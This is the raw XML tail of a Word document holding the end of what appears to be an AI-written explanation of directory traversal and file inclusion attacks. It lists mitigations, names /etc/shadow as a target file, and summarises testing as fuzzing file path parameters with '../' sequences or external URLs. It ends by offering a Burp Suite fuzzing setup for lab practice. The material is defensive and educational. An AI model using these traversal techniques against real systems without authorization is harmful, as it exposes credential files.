          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>Disable allow_url_include.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B196900" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve">Run apps with </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>least privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> (so /etc/shadow isn’t readable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DE11B9" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAFs</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> to block traversal patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5AAF2F" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:r w:rsidRPr="00AE753B">
        <w:pict w14:anchorId="1E6CCFAF">
          <v:rect id="_x0000_i1079" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FF9B21" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:br/>
        <w:t xml:space="preserve">Directory Traversal and File Inclusion attacks happen when an app </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>improperly handles file paths</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> from user input. Testing involves fuzzing file path parameters with traversal (../) or external URLs to see if sensitive files can be accessed or included.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEF20E5" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:r w:rsidRPr="00AE753B">
        <w:pict w14:anchorId="4F682512">
          <v:rect id="_x0000_i1080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CDDE36" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> Do you want me to also give you a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Burp Suite Intruder setup example for fuzzing traversal payloads</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t>, so you can practice this in your lab?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1B2E29" w14:textId="77777777" w:rsidR="0000111E" w:rsidRPr="00AE753B" w:rsidRDefault="0000111E" w:rsidP="00AE753B"/>
    <w:sectPr w:rsidR="0000111E" w:rsidRPr="00AE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44441"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8C86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F51BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5EA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73929"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3AA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4171"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F98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E0BF2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C57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E48E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="706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46F41"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C264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E18CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="220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951E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E4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15623">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2120949792">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2092851619">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1633319693">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1770079234">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="670134825">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="500049549">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1661079131">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="726539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EC"/>
    <w:rsid w:val="0000111E"/>
    <w:rsid w:val="005E4A76"/>
    <w:rsid w:val="0072345A"/>
    <w:rsid w:val="00984DF0"/>
    <w:rsid w:val="00AE753B"/>
    <w:rsid w:val="00C542EC"/>
    <w:rsid w:val="00CA035E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E6E28-79FE-431D-9B79-8CA61D87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EC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EC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EC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EC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EC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EC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54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E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E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54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EC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C54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EC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54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2025-08-17T04:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-17T04:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>